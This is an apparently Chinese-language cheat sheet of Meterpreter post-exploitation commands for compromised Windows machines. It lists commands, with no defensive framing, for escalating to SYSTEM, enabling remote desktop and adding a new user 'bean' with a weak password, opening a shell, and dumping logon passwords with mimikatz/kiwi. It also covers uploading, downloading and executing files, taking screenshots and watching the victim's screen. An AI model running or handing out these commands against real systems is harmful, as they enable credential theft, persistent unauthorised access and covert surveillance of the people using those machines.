meterpreter命令

获取system权限

1
getsystem

远程桌面

开启3389

1
run post/windows/manage/enable_rdp

以下已过时

开启windows远程桌面3389

1
2
run post/windows/manage/enable_rdp
run getgui -e

开启远程桌面并添加一个新用户bean

1
run getgui -u bean -p 123456

开启远程桌面并绑定在8888端口

1
run getgui -e -f 8888

获取shell

1
shell

密码抓取

需要借助mimikatz 猕猴桃模块,现在改用kiwi模块了

步骤如下:

  1. get uid查看以下用户名和权限
1
getuid
  1. 查看密码
1
2
load mimikatz
kiwi_cmd sekurlsa::logonPasswords

上传下载执行

上传

1
upload /xxx/xxx

下载

1
download /xxx/xxx

执行

1
execute -f <path> [options]

截图、监控相关

截图

1
2
load espia
screengrab

屏幕监控

1
screenshare